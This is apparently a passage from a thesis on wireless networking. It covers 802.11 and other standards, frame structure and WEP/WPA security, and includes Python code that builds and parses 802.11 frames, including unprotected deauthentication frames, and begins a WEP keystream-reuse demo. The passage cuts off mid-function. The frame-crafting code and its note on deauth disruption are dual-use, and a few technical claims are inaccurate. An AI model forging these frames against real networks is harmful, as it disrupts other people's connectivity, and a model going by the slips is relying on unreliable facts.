In contrast to other wireless networks that transmit in a single frequency range, WiMAX allows data
transfer in multiple frequency bands. The original specification operates in the range 10-66 GHz, with
data transfer rates of up to about 120 Mbps.
¹ For more information: en.wikipedia.org/wiki/IEEE_802.11
² For more information: en.wikipedia.org/wiki/IEEE_802.16
³ For more information: en.wikipedia.org/wiki/HiperLAN
⁴ For more information: www.labs.hpe.com/personal/Jean_Tourrilhes/Linux/Linux.Wireless.std.html
⁵ For more information: en.wikipedia.org/wiki/HomeRF
⁶ For more information: en.wikipedia.org/wiki/Bluetooth
A significant difference between IEEE 802.16 and IEEE 802.11 is that the former is designed for much
longer distances, at data rates on the order of 50 Mbps.
B) Openair standard
OpenAir was an early wireless standard promoted by the Wireless LAN Interoperability Forum and
implemented predominantly by Proxim Wireless devices. It operated in the 2.4 GHz ISM band and used
frequency hopping with 0.8 and 1.6 Mbit/s bit rates, using 2-level or 4-level modulation. The
protocol used was CSMA/CA, based on the exchange of RTS/CTS packets.
C) Hiperlan standard

HiperLAN is a standard for wireless networking in the 5.1-5.3 GHz band, developed in 1996 by ETSI
(European Telecommunications Standards Institute).
There are four versions:
1. HiperLAN/1
2. HiperLAN/2
3. HiperAccess
4. HiperLink
Due to competition from IEEE 802.11, which was simpler to implement and as a result made it faster
to market, HiperLAN never received much commercial implementation. Much of the work on
HiperLAN/2 has survived in the PHY specification for IEEE 802.11a, which is nearly identical to the
PHY of HiperLAN/2. HIPERACCESS was intended as a last-mile technology. HIPERLINK was
intended as a short-range point-to-point technology at 155 Mbit/s.
D) HomeRF SWAP standard

HomeRF was a wireless networking specification for home devices. It was developed in 1998 by the
Home Radio Frequency Working Group, a consortium of wireless companies that included Proxim
Wireless, Intel, Siemens AG, Motorola, Philips and more than 100 others. Its SWAP (Shared Wireless
Access Protocol) operates at 2.4 GHz using FHSS, with transmission rates of 1 and 2 Mbps.
E) Bluetooth standard

Bluetooth is a wireless technology standard for exchanging data over short distances between fixed
and mobile devices and for building personal area networks (PANs). Invented by the telecom vendor
Ericsson in 1994, it was originally conceived as a wireless alternative to RS-232 data cables. It can
connect several devices, overcoming problems of synchronization. It uses FHSS in the 2.4 GHz band,
with a range from about 10 m up to roughly 100 m depending on device class, and a data rate of up to
3 Mbps.

2.6. The 802.11 standard


IEEE 802.11 is a set of standards for wireless local area networks (WLANs). The standard is better
known as Wi-Fi. IEEE 802.11 comprises the original specification and a number of amendments to it.
The original 802.11 standard was published in 1997. This standard provided a data speed of 1 or 2
Mbit/s. The standard operates in the nearly worldwide available 2.4 GHz band ranging from 2400 -
2483.5 MHz. The standard uses either frequency hopping or coding (direct sequence spread spectrum)
technology to make the transmissions robust.

2.6.1. 802.11 versions
Since the original version, the standard has been extended by a series of amendments, identified by
letters.
 802.11a and 802.11h: The 802.11a extension to 802.11 was developed to make use of the lower
part of the 5 GHz band. The standard has a maximum bit rate of 54 Mbit/s using OFDM. The
allocation in the 5 GHz band for RLAN was later extended. The 5 GHz band ranging from 5150-
5350 and from 5470 - 5725 MHz can be used nowadays in most parts of the world. However,
equipment has to detect and avoid radar systems that use the band and need to have transmit
power control. The 802.11h standard was developed to cater for these provisions.
 802.11b: The IEEE 802.11 standard became popular after the publication of the 802.11b
extension in 1999. This extension to the original standard provides a maximum bit rate of 11
Mbit/s. The bit rate will be decreased to 5.5, 2 or 1 Mbit/s if the link quality decreases. The
802.11b standard uses direct sequence spread spectrum coding.
 802.11e: The IEEE 802.11e standard provides a set of Quality of Service features including
priority of data streams. This standard is mainly of relevance for time critical applications, such as
voice and streaming multimedia.
 802.11f (cancelled): IEEE 802.11f was a recommendation to ease handovers between access
points of different firms. The recommendation is withdrawn.
 802.11g : The 802.11g standard was a further development of the standard to improve the bit rate
if the link quality allows. The maximum bit rate is 54 Mbit/s. This bit rate can only be achieved if
the user is in the vicinity of the access point.
 802.11i:IEEE 802.11i enhances authentication and encryption. The original standard included
WEP (Wired Equivalent Privacy) which proved to be vulnerable. The improved version in IEEE
802.11i is commonly known as WPA2. An intermediate version called WPA (Wi-Fi Protected
Access) was introduced after the security issues with WEP were shown. WPA uses a subset of
IEEE 802.11i.
 802.11j: IEEE 802.11j is an amendment to the IEEE 802.11 standard for the Japanese market. It
allows Wireless LAN operation in the 4.9 to 5 GHz band.
 802.11k:IEEE 802.11k is an amendment to the standard for radio resource management. It allows
exchange of radio and network information. This information can be used by the client to switch
to the best available access point.
 802.11n: IEEE 802.11n is a standard that further improves data throughput, up to a maximum net bit
rate of 600 Mbit/s. This throughput is achieved by using wider channels (channel bonding) and
advanced antenna technology (MIMO).
 802.11r: IEEE 802.11r adds support for roaming to the standard. This makes seamless
handovers possible in larger areas with WiFi coverage.
 802.11s: IEEE 802.11s defines how traffic can be delivered over self-configuring multi-hop
topologies to create a WLAN mesh network.
 802.11z: IEEE 802.11z is a mechanism to directly transfer data between two Wi-Fi clients that are
part of the same Wi-Fi network.
 802.11ac: IEEE 802.11ac Gigabit Wi-Fi is specifically designed to increase the bit rate in the 5
GHz band. This band offers more channels with a better separation than the 2.4 GHz band. IEEE
802.11ac makes channel bonding possible up to a channel width of 80 MHz, and even 160 MHz
under certain conditions. IEEE 802.11ac further uses MIMO and more efficient data encoding
mechanisms to increase the maximum bit rate up to 6.93 Gbit/s under certain specialized
conditions.

 802.11ad: IEEE 802.11ad is specifically designed for use in the unlicensed 60 GHz band, where far
more bandwidth is available than in the 2.4 and 5 GHz bands. Development of the standard started in
the Wireless Gigabit Alliance (WiGig), and the work has since moved into the IEEE 802.11ad
specification.
 802.11af : IEEE 802.11af is an amendment that uses white spaces in the TV bands. It is also
known as White-Fi.

2.6.2 Architecture of IEEE 802.11


The smallest building block of a wireless network is the Basic Service Set (BSS). It consists of a
number of stations that run the same MAC protocol and compete for access to the same shared wireless
medium. Each BSS has a coverage area, the Basic Service Area, which is determined by the technical
characteristics of the devices and antennas. Each station belongs to only one BSS, i.e. it is within
wireless range only of the stations in the same BSS. A BSS operates in one of two modes:
Independent BSS or Ad-hoc mode
This is the simplest way to create a wireless network: each wireless station communicates directly
with all the other stations. An ad-hoc network is very easy and quick to set up, so it is usually used
where a data-exchange network is needed for a limited time. Its security options are quite limited
compared with an infrastructure BSS.

Image 4 - Representation of Ad-hoc mode

Source: www.techtolink.com.hk

Infrastructure BSS
Infrastructure wireless networks vary from the ad-hoc, because of the use of access points. In
infrastructure mode, a base station acts as a wireless access point hub, and nodes communicate through
the hub. The hub usually, but not always, has a wired or fiber network connection, and may have
permanent wireless connections to other nodes.

Image 5 - Representation of Infrastructure BSS mode

Source: ardidudidam.blogspot.com
The use of an access point provides two significant advantages:
 The radius of the BSS service area is determined by the distance from the access point, so it is
sufficient for each station to be in range of the access point rather than of every other station.
 The structure of the infrastructure BSS enables network management from a central node and
provides great flexibility in security, since every wireless station must first connect to the access
point before it can communicate with the rest of the network.

Extended Service Set (ESS): An Extended Service Set is a component of the IEEE 802.11 WLAN
architecture that extends mobility beyond a single Basic Service Set (BSS). An ESS is a set of two or
more BSSs that form a single subnetwork.

Image 6 - Infrastructure mode and an ESS

Source: technet.microsoft.com

The Distribution System (DS) is the component of the architecture that interconnects BSS. The
connection is achieved by connecting the access points of the BSS together via a network trunk. This
solution enables communication of wireless stations located in different BSS, as well as the migration
from one BSS to another without interrupting the communication. Of course, this can only be done
provided that there are no gaps in coverage between BSS.

2.6.3. Services of IEEE 802.11


IEEE 802.11 defines a set of services that provide the functionality needed for the LLC layer to send
and receive MSDUs (MAC Service Data Units), giving functionality equivalent to that of wired
networks.
The services include the following:

Distribution: A station uses the distribution service every time it sends MAC frames across a distribution
system. The 802.11 standard does not specify how the distribution system delivers the data. The
distribution service provides the distribution system with only enough information to determine the
proper BSS destination.

Integration: Because the characteristics of the distribution system are unspecified by the IEEE 802.11
standard, integration is needed. The integration service enables the delivery of MAC frames through a
portal between a distribution system and a non-802.11 LAN. The integration function performs all
required media or address space translations. The details of an integration function depend on the
distribution system implementation and are beyond the scope of the 802.11 standard.

Delivery of MSDU: The delivery of MAC Frames (MAC Service Data Unit) to their final destination.
Association: Each station must initially invoke the association service with an access point before it can
send information through a distribution system. The association maps a station to the distribution system
via an access point. Each station can associate with only a single access point, but each access point can
associate with multiple stations. Association is also a first step to providing the capability for a station to
be mobile between BSSs.
Reassociation: Enables an established association to be transferred from one access point to another,
allowing a mobile station to move from one BSS to another while retaining its connection to the
network.
Disassociation: A station or access point may invoke the disassociation service to terminate an existing
association. This service is a notification; therefore, neither party may refuse termination. Stations should
disassociate when leaving the network. An access point, for example, may disassociate all its stations if
being removed for maintenance.
Authentication: Used by stations to verify one another's identity. In a wired network, physical access
to a connection is generally taken to confer the right to use the network. In a wireless network the
physical connection is obtained simply by having an antenna tuned to the right frequency, so the
authentication service is what stations use to prove their identity.
Deauthentication: This service is used to terminate an existing authentication. Like disassociation it
is a notification and cannot be refused; in the base standard the frame that carries it is not itself
authenticated, so a station should treat an unexpected deauthentication with suspicion.
Privacy: Used to prevent the contents of messages from being read by stations other than the intended
recipient. The standard allows the optional use of encryption to provide this protection.
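The services above drive a small state machine that every access point keeps for each station: unauthenticated and unassociated, authenticated but unassociated, and authenticated and associated. The following is an added example, not code from the dissertation, that models those states, the frame classes each permits and the access point's response to a frame sent from too low a state; the event names, the Station class and the sample MAC addresses are assumptions of the example.

```python
"""Station state machine driven by the 802.11 services listed above.

Added example, not from the dissertation. The three states, the frame
classes they admit and reason codes 6 and 7 follow the base IEEE 802.11
standard; the service names, the Station class and the sample MAC
addresses are this example's own.
"""
from enum import IntEnum
from typing import List, Optional, Tuple


class State(IntEnum):
    UNAUTH_UNASSOC = 1   # State 1: only class 1 frames (probe, authentication, deauth, beacon)
    AUTH_UNASSOC = 2     # State 2: class 1 and 2 frames (association, reassociation, disassociation)
    AUTH_ASSOC = 3       # State 3: class 1, 2 and 3 frames (data, PS-Poll)


# Lowest state in which a frame of each class may be exchanged.
MIN_STATE_FOR_CLASS = {1: State.UNAUTH_UNASSOC, 2: State.AUTH_UNASSOC, 3: State.AUTH_ASSOC}

# Reason codes the standard assigns when a frame arrives in too low a state.
REASON_CLASS2_FROM_NONAUTH = 6
REASON_CLASS3_FROM_NONASSOC = 7

# service -> (states it may succeed from, resulting state)
TRANSITIONS = {
    "authentication":   ({State.UNAUTH_UNASSOC}, State.AUTH_UNASSOC),
    "association":      ({State.AUTH_UNASSOC}, State.AUTH_ASSOC),
    "reassociation":    ({State.AUTH_UNASSOC, State.AUTH_ASSOC}, State.AUTH_ASSOC),
    "disassociation":   ({State.AUTH_ASSOC}, State.AUTH_UNASSOC),
    "deauthentication": (set(State), State.UNAUTH_UNASSOC),   # valid from any state
}


class Station:
    """Per-station state as an access point tracks it."""

    def __init__(self, mac: str) -> None:
        self.mac = mac
        self.state = State.UNAUTH_UNASSOC
        self.history: List[State] = [self.state]

    def invoke(self, service: str) -> State:
        """Apply a successful service invocation; reject ones not valid in this state."""
        allowed_from, target = TRANSITIONS[service]
        if self.state not in allowed_from:
            raise ValueError(f"{service} not valid for {self.mac} in {self.state.name}")
        self.state = target
        self.history.append(target)
        return target

    def may_send(self, frame_class: int) -> bool:
        return self.state >= MIN_STATE_FOR_CLASS[frame_class]


def ap_reaction(station: Station, frame_class: int) -> Optional[Tuple[str, int]]:
    """What the AP sends back when a frame arrives in too low a state (None if accepted).

    A class 2 frame from a State 1 station is answered with a deauthentication
    (reason 6); a class 3 frame from a State 2 station with a disassociation
    (reason 7); a class 3 frame from a State 1 station with a deauthentication,
    for which this example reuses reason 7.
    """
    if station.may_send(frame_class):
        return None
    if station.state == State.UNAUTH_UNASSOC:
        reason = REASON_CLASS2_FROM_NONAUTH if frame_class == 2 else REASON_CLASS3_FROM_NONASSOC
        return ("deauthentication", reason)
    return ("disassociation", REASON_CLASS3_FROM_NONASSOC)


def replay(mac: str, services: List[str]) -> List[State]:
    """Run a sequence of services for one station and return the state trace."""
    sta = Station(mac)
    for service in services:
        sta.invoke(service)
    return sta.history
```

A single deauthentication drops a station back to State 1, so it must authenticate and associate again before it can send any data frame. That is what makes the notification-only, unauthenticated deauthentication frame such an effective disruption tool.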

2.6.4.IEEE 802.11 Protocol Architecture


The IEEE 802 standards committee defines two separate sublayers, Logical Link Control (LLC) and
Media Access Control (MAC), for the data-link layer of the OSI model. The IEEE 802.11 wireless
standard specifies the physical layer and the MAC sublayer, which communicates upwards with the LLC
sublayer, as shown in the following figure.

Image 7 - 802.11 and OSI Model

Source: technet.microsoft.com

The physical layer defines how to transmit and receive signals. The data-link layer of the OSI
model is subdivided into two sublayers, the Medium Access Control (MAC) and the Logical Link
Control (LLC). The MAC sublayer defines how the transmission medium is accessed and how reliable
data transmission is achieved. Finally, the LLC sublayer is a common interface shared by all IEEE LAN
standards.

The MAC sublayer is responsible for the following functions:
 Controlling the stations' access to the transmission medium
 Fragmentation and reassembly
 Packet retransmission
 Positive acknowledgement.
The MAC sublayer architecture specifies two access methods:
 Distributed Coordination Function (DCF)
 Point Coordination Function (PCF)
DCF is the basic method and serves as the foundation for PCF, which implements a polling algorithm
on top of it in an attempt to provide better QoS.
Distributed coordination function (DCF) is the fundamental MAC technique of IEEE 802.11 WLANs. It
is the basic method for asynchronous data transfer, and all stations must support it. Its operation
is based on Carrier Sense Multiple Access with Collision Avoidance (CSMA/CA). DCF has no collision
detection mechanism of the kind used by CSMA/CD, because detecting a collision is not practical in a
wireless network: a radio cannot listen while it transmits. Before transmitting, a station monitors
the medium to ascertain whether another station is already transmitting. In a wired network this is
easy, because all nodes are connected to a common cable and can hear each other. In a wireless
network each station's transceiver has a limited range and can hear only its neighbours, so two
stations that are out of each other's range may both transmit to the same receiver without either
detecting the other (the hidden node problem). To guard against this, sender and receiver can
exchange short Request to Send (RTS) and Clear to Send (CTS) control frames before the data frame;
every station that hears either of them defers for the duration announced in it, which reduces the
probability of a collision. The exchange is done after checking that the medium is free and just
before sending the data. It improves reliability in networks with many stations, where collisions are
more likely.
Point coordination function (PCF) is an optional MAC technique in IEEE 802.11 WLANs, layered on top
of DCF: time is divided into a contention-free period, in which PCF is used, and a contention period,
in which DCF is used. It requires a central station, the point coordinator (normally the access
point), which takes centralized control of transmissions. The point coordinator polls the stations in
turn to ask whether they have data to send, and a station may transmit only when it has been polled.

The MAC frame

The devices in a wireless network communicate by exchanging frames at the MAC sublayer. The 802.11
frame format is shown below.

Image 8 - 802.11 MAC Frame Format

Source: technet.microsoft.com

The MAC frame consists of a header of up to 30 bytes, a frame body of variable length and a 4-byte
Frame Check Sequence (FCS).
Frame Control Field
This field is important because it states the type of frame and provides control information.

Image 9 - Frame Control Field

Source: technet.microsoft.com

It consists of 11 subfields, several of which matter for the security mechanisms of 802.11. They are
the following:
 Protocol version: Indicates the version of the 802.11 MAC used in the frame (currently always 0).
 Type: Determines the frame type: control, data or management.
 Subtype: Subdivides each of the basic types into subtypes (deauthentication, for example, is a
management subtype).
 To DS: Set to 1 when a data frame is destined for the distribution system.
 From DS: Set to 1 when a data frame leaves the distribution system.
 More fragments: Set to 1 when further fragments of the same frame follow.
 Retry: Set to 1 when the frame is a retransmission.
 Power Management: Indicates the power-management state of the transmitting station; a value of 1
means the station will enter sleep mode.
 More Data: Indicates that the sender (typically the access point) has more buffered data for the
station. Each data block may be transmitted as a single frame or as a group of fragments in multiple
frames.
 Protected frame: This bit was called WEP in the original 802.11 standard. It was renamed in
802.11i and, when set to 1, declares that the body of the frame is encrypted with a security protocol.
 Order: Set to 1 when the frame is delivered using the strictly ordered service class.
Duration/ID Field
This field is present in all frames. In most frames it carries the duration, in microseconds, for
which the medium will remain busy until the end of the current exchange; other stations use it to set
their network allocation vector (NAV) and defer. When the frame is a control frame of subtype Power
Save (PS) Poll, the field instead contains the association identity (AID) of the transmitting STA.
Address Fields
Depending upon the frame type, the four address fields will contain a combination of the following
address types:

 BSS Identifier (BSSID). BSSID uniquely identifies each BSS. When the frame is from an STA
in an infrastructure BSS, the BSSID is the MAC address of the AP. When the frame is from a
STA in an IBSS, the BSSID is the randomly generated, locally administered MAC address of the
STA that initiated the IBSS.

 Destination Address (DA). DA indicates the MAC address of the final destination to receive the
frame.

 Source Address (SA). SA indicates the MAC address of the original source that initially created
and transmitted the frame.

 Receiver Address (RA). RA indicates the MAC address of the next immediate STA on the
wireless medium to receive the frame.

 Transmitter Address (TA). TA indicates the MAC address of the STA that transmitted the
frame onto the wireless medium.

Sequence Control
This field contains two subfields, the Fragment Number field and the Sequence Number field.

Image 10 - Sequence Control Field

Source: technet.microsoft.com

Sequence Number indicates the sequence number of each frame. The sequence number is the same for
each frame sent for a fragmented frame; otherwise, the number is incremented by one until reaching
4095, when it then begins at zero again.
Fragment Number indicates the number of each fragment of a fragmented frame. The initial value is 0
and it is incremented by one for each subsequent fragment.
Frame Check Sequence
The transmitting STA computes a cyclic redundancy check (CRC-32) over all the fields of the MAC header
and the frame body to generate the Frame Check Sequence value. The receiving STA runs the same CRC
calculation and compares its result with the received FCS to determine whether any errors occurred
during transmission. The FCS detects transmission errors only; it offers no protection against
deliberate modification, which is the job of the security protocols discussed in the next chapter.
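The frame layout described in this section, as an added example that is not code from the dissertation: a small Python builder and parser for 802.11 management and data frames, covering the little-endian Frame Control bits, the Duration/ID field, the meaning of Address 1-4 under the To DS/From DS bits, the Sequence Control split and the CRC-32 FCS. The MAC addresses, reason code and duration used are constructed sample values, and control-frame formats are left out.

```python
"""Build and decode IEEE 802.11 MAC frames with the header layout described above.

Added example, not code from the dissertation. Field layout (little-endian
Frame Control and Duration/ID, Address 1-3, Sequence Control, optional
Address 4 on four-address data frames, body, CRC-32 FCS) follows IEEE 802.11.
All MAC addresses, reason codes and durations used with it are constructed
sample values, not captured traffic.
"""
import struct
import zlib
from typing import Dict, List, Sequence

TYPE_NAMES = {0: "management", 1: "control", 2: "data"}
# Frame Control flag bits in the second octet, bit 0 first (To DS ... Order).
FLAG_NAMES = ["to_ds", "from_ds", "more_frag", "retry", "pwr_mgt",
              "more_data", "protected", "order"]
SUBTYPE_DISASSOC, SUBTYPE_DEAUTH = 10, 12   # management subtypes


def mac_bytes(mac: str) -> bytes:
    return bytes(int(octet, 16) for octet in mac.split(":"))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def fcs(pdu: bytes) -> bytes:
    """Frame Check Sequence: CRC-32 over header and body, transmitted little-endian."""
    return struct.pack("<I", zlib.crc32(pdu) & 0xFFFFFFFF)


def build_frame(ftype: int, subtype: int, addrs: Sequence[str], body: bytes = b"",
                flags: Sequence[str] = (), seq_num: int = 0, frag: int = 0,
                duration: int = 0) -> bytes:
    """Assemble header + body + FCS. Four addresses produce a WDS (AP to AP) data frame."""
    fc = (subtype << 4) | (ftype << 2)              # protocol version bits stay 0
    for name in flags:
        fc |= 1 << (8 + FLAG_NAMES.index(name))
    header = struct.pack("<HH", fc, duration)
    header += b"".join(mac_bytes(a) for a in addrs[:3])
    header += struct.pack("<H", (seq_num << 4) | frag)   # 12-bit sequence, 4-bit fragment
    if len(addrs) == 4:
        header += mac_bytes(addrs[3])
    pdu = header + body
    return pdu + fcs(pdu)


def address_roles(ftype: int, to_ds: bool, from_ds: bool, addrs: List[str]) -> Dict[str, str]:
    """Map Address 1-4 to DA/SA/BSSID/RA/TA according to frame type and DS bits."""
    a1, a2, a3 = addrs[:3]
    if ftype != 2 or (not to_ds and not from_ds):   # management, or station-to-station
        return {"DA": a1, "SA": a2, "BSSID": a3}
    if from_ds and not to_ds:                        # access point -> station
        return {"DA": a1, "BSSID": a2, "SA": a3}
    if to_ds and not from_ds:                        # station -> access point
        return {"BSSID": a1, "SA": a2, "DA": a3}
    return {"RA": a1, "TA": a2, "DA": a3, "SA": addrs[3]}   # WDS, four addresses


def parse_frame(frame: bytes) -> Dict[str, object]:
    """Decode a management or data frame; raise ValueError if the FCS does not match."""
    if len(frame) < 28 or fcs(frame[:-4]) != frame[-4:]:
        raise ValueError("frame too short or FCS mismatch")
    fc, duration = struct.unpack_from("<HH", frame, 0)
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    flags = {name: bool((fc >> (8 + i)) & 1) for i, name in enumerate(FLAG_NAMES)}
    if ftype == 1:
        raise NotImplementedError("control frames carry only RA/TA and are not decoded here")
    addrs = [mac_str(frame[4 + 6 * i: 10 + 6 * i]) for i in range(3)]
    seq_ctrl = struct.unpack_from("<H", frame, 22)[0]
    offset = 24
    if ftype == 2 and flags["to_ds"] and flags["from_ds"]:
        addrs.append(mac_str(frame[24:30]))
        offset = 30
    # QoS data subtypes add a 2-byte QoS Control field here; not handled in this example.
    body = frame[offset:-4]
    parsed: Dict[str, object] = {
        "version": fc & 0x3, "type": TYPE_NAMES[ftype], "subtype": subtype,
        "flags": flags, "duration": duration,
        "addresses": address_roles(ftype, flags["to_ds"], flags["from_ds"], addrs),
        "sequence": seq_ctrl >> 4, "fragment": seq_ctrl & 0xF, "body": body,
    }
    if ftype == 0 and subtype in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH):
        parsed["reason_code"] = struct.unpack_from("<H", body, 0)[0]   # 2-byte reason code
    return parsed


def is_unprotected_deauth(parsed: Dict[str, object]) -> bool:
    """Deauthentication or disassociation with the Protected Frame bit clear: nothing in
    such a frame authenticates its sender, so any station in range could have forged it."""
    return (parsed["type"] == "management"
            and parsed["subtype"] in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH)
            and not parsed["flags"]["protected"])
```

A flipped bit anywhere in the header or body makes the FCS check fail, which is all the FCS is for; the `is_unprotected_deauth` check is the kind of rule a wireless intrusion detection sensor applies to spot forged disconnects.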

CHAPTER 3: SECURITY IN WIRELESS NETWORKS

The advantages of wireless networks are numerous, but the data moving through the network is
transmitted over radio, which allows anyone within range to receive it or attempt to connect. This
immediately created the need for network security. Confidentiality, integrity, authentication and
availability of the exchanged information now depend on encryption protocols, which were built on
already known cryptographic methods and therefore inherited whatever strengths and weaknesses those
methods had shown in other implementations of modern cryptography.

3.1. What is encryption?


In cryptography, encryption is the process of encoding messages or information in such a way that only
authorized parties can read it. There are two groups of encryption algorithms:
1. Symmetric encryption algorithms, also known as secret-key (or private-key) cryptography
algorithms, where the encryption and decryption keys are the same and the communicating parties must
share that key before they can communicate securely.

2. Asymmetric encryption algorithms, also known as public-key cryptography algorithms, where the
encryption key is published for anyone to use to encrypt messages, but only the receiving party has
access to the decryption key that enables the messages to be read.
The main purpose of encryption is to provide mechanisms for two or more members to communicate
without anyone else having the capability to read the information.
The four main security goals that cryptography serves are the following:
Confidentiality: The transmitted information is accessible only to the authorized members and is
unintelligible to any third party.
Integrity: Protecting information from being modified by unauthorized parties.
Availability: Ensuring that authorized parties are able to access the information when needed.
Non-repudiation: The author of a statement cannot successfully deny having authored it, or the
validity of an associated contract.
Encryption relies on some basic terms:
 Plaintext that is the information a sender wishes to transmit to a receiver.
 Key that is a piece of information that controls the operation of a cryptography algorithm.
 Cipher text-Encrypted Information that is the result of encryption performed on plaintext using
an algorithm, called a cipher.

Image 11 - A simple Encryption-Decryption system

Source: msdn.microsoft.com
The encryption and decryption of a message is done using an algorithm and an encryption key. Usually
the algorithm of encryption is known, so that the confidentiality of the encrypted message transmitted is
based mostly on the privacy of the encryption key.

3.1.1. Symmetric key encryption


Symmetric key encryption is a cryptography technique that uses a shared secret key to encrypt and also to
decrypt data.
The disadvantage of symmetric-key encryption is the difficulty of exchanging the key securely: the
sender and the receiver must agree on the key in advance, over a channel the adversary cannot read,
before they can communicate securely.
Instead, the main advantage of symmetric key algorithms is that the process of encryption and decryption
is very fast and does not consume significant computing power. Symmetric encryption algorithms are
very efficient at processing large amounts of information and computationally less intensive than
asymmetric encryption algorithms.
There are two types of symmetric encryption algorithms: stream ciphers and block ciphers which provide
bit-by-bit and block encryption respectively.

3.1.2. Public key encryption


Public-key cryptography, also known as asymmetric cryptography, is a class of cryptographic
protocols based on algorithms that require two separate keys, one of which is secret (or private) and one
of which is public.
Public key cryptography was invented in 1976 by Whitfield Diffie and Martin Hellman. For this reason,
it is sometimes called Diffie-Hellman encryption. It is also called asymmetric encryption because it uses
two keys instead of one, as symmetric encryption does.
The key used for encryption is different from the key used for decryption. The sender and the recipient
hold different keys for different functions, the private and the public key. The private key must be kept
secret, whereas the public key can be communicated to the recipients.
The security of this type of cryptographic algorithm rests on the fact that knowledge of the public
encryption key does not in any way allow the private key to be calculated.

3.2. Wireless network encryption protocols


In several areas of Greece, even today, one can observe many networks that do not use
any kind of encryption. In these unsecured networks there is obviously no protection for the connected
users, regarding either the information exchanged or the data stored within the network.
Encryption of wireless networks can be divided into two main categories:
1. WEP encryption protocol: Techniques for recovering the secret key of this protocol are nowadays
widely known. It uses the RC4 encryption algorithm.
2. WPA/WPA2 encryption protocols: These replaced the insecure WEP and use the CCMP algorithm,
which is based on AES (Advanced Encryption Standard).

3.2.1. WEP encryption


The encryption algorithm RC4 (Rivest Cipher 4) is used in the protocol to provide both confidentiality
and integrity of data.

Image 12- Standard WEP Encryption Process using RC4 algorithm with XOR operation

Source: resources.infosecinstitute.com
WEP is a symmetric encryption scheme with a key length of 64 or 128 bits. RC4 expands the key into a
pseudo-random bit sequence (keystream), which is combined with the data by the well-known XOR
function in order to generate the ciphertext. The RC4 key is formed from a 24-bit Initialization Vector
and the encryption key (pre-shared key) entered by the user, which is 40 or 104 bits long. The keystream
is fed into an XOR gate together with the original text (plaintext) to build up the final encrypted text.
Packet integrity is checked with a checksum: the CRC32 algorithm was developed to detect, identify
and often correct errors during the transmission of packets.

3.2.2. WPA encryption (Wi-Fi Protected Access)


In 2004, the IEEE 802.11i standard introduced a new security protocol for Wi-Fi Protected
Access, WPA. Essentially it is the replacement of WEP, because more security was necessary in wireless
transmission. It was an interim solution until the full development of 802.11i with the WPA2
protocol. WPA improves on WEP encryption and adds a strong authentication mechanism.
WPA allows two kinds of authentication, WPA-802.1x (also known as WPA-Enterprise) and
WPA-PSK (or WPA-Home).
- WPA-PSK (pre-shared key) is basically an authentication mechanism in which users provide some
form of credential to verify that they should be allowed access to a network. This requires a
single password entered into each WLAN node (access points, wireless routers, client
adapters, bridges). As long as the passwords match, a client will be granted access to the WLAN.
Image 13 - WPA-PSK mode

Source: www.tp-link.us

- WPA-Enterprise. This mode provides the security needed for wireless networks in business
environments. It is more complicated to set up, but it offers individualized and centralized control
over access to the Wi-Fi network. When users try to connect to the network, they need to present
their login credentials.
Image 14 - WPA-Enterprise mode

Source: www.tp-link.us
This mode supports 802.1x RADIUS authentication and is appropriate in cases where
a RADIUS server is deployed. WPA-Enterprise should only be used when a RADIUS server is
available for client authentication.

3.2.2.1 Security in WPA


WPA uses the RC4 algorithm with an initialization vector 48 bits in length (compared to 24 bits in
WEP) and a security key 128 bits in length.

Image 15 - WPA implementation (*)

where DA = Destination Address , SA = Source Address

Keeping RC4 ensures compatibility with earlier generations of wireless networking products. In
addition, WPA introduces the Temporal Key Integrity Protocol (TKIP), which dynamically renews the
keys during the connection. To reduce reuse of the same key, a sequence number per transmitted
packet, the pre-shared key and the transmitting MAC address are combined.
The initialization vector is added to the newly generated key and a new keystream is then generated. To
enhance the integrity of packets, an integrity check field was added, the MIC (Message
Integrity Check). The value of the MIC is calculated by the cryptographic algorithm "Michael" and
protects the message and the addresses of the sender and recipient. A further feature is a
special mechanism that detects any attempted attack on TKIP and then blocks communication.

3.2.2.2. Authentication in WPA

Authentication in the WPA-Personal or WPA-PSK protocol is designed for professional
and home use. With this method, user authentication is done via the access point using a passphrase of
8 to 63 ASCII characters. From the selected ASCII characters, a hash function reduces up to
504 bits (63 characters * 8 bits) to 256 bits.
Subsequently the access point provides the station with a temporary key, which is updated at regular
intervals. The 256-bit key is calculated with the hash function PBKDF2, using the original passphrase as
its key.

3.2.3. WPA or WEP

The WPA and WEP encryption protocols both use the RC4 encryption algorithm. However, WEP uses a
24-bit initialization vector and an encryption key of 40 or 104 bits, in contrast to WPA, which
uses a 48-bit initialization vector and a 128-bit encryption key.
WEP is insufficient for security, because attacks target the initialization vector and the modification of
packets. WPA has minimized such attacks through the combination of TKIP, the MIC and the
longer initialization vector.
TKIP provides about 250 trillion possible keys to encrypt a packet. Combined with the 48-bit
initialization vector, TKIP contributes effectively to network security against key recovery attacks. Also,
the MIC provides protection against packet interception.
WPA-Enterprise and WPA-PSK encryption provide a strong security mechanism. In WEP, user
authentication was done by sharing a common key. In WPA, authentication and encryption are separate
functions. Authentication against the 802.1x server is done with credentials, and the keys are distributed
automatically.
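The comparison of WEP's 24-bit IV (section 3.2.1) with the 48-bit IV of WPA (this section) can be made concrete with a small calculation. The Python below is an added example, not code from the thesis: it applies the birthday bound to estimate after how many frames an IV repeat becomes more likely than not for each IV length, and shows why a repeated IV is a confidentiality failure for a stream cipher: encrypting two packets under the same keystream and XORing the two ciphertexts cancels the keystream and leaves the XOR of the two plaintexts. The keystream is random bytes standing in for RC4 output (an assumption for the demonstration) and the plaintexts are constructed.

```python
import math
import os


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """Byte-wise XOR of two equal-length byte strings (the WEP combining step)."""
    if len(a) != len(b):
        raise ValueError("inputs must have equal length")
    return bytes(x ^ y for x, y in zip(a, b))


def iv_collision_probability(iv_bits: int, frames: int) -> float:
    """Birthday-bound probability that at least two of `frames` independently
    chosen IVs drawn from a 2**iv_bits space are identical."""
    space = 2 ** iv_bits
    return 1.0 - math.exp(-frames * (frames - 1) / (2.0 * space))


def frames_for_even_odds(iv_bits: int) -> int:
    """Number of frames after which an IV repeat is more likely than not
    (sqrt(2 ln 2 * 2**bits), the usual birthday approximation)."""
    return math.ceil(math.sqrt(2.0 * math.log(2.0) * 2 ** iv_bits))


def keystream_reuse_leak(keystream: bytes, p1: bytes, p2: bytes) -> bytes:
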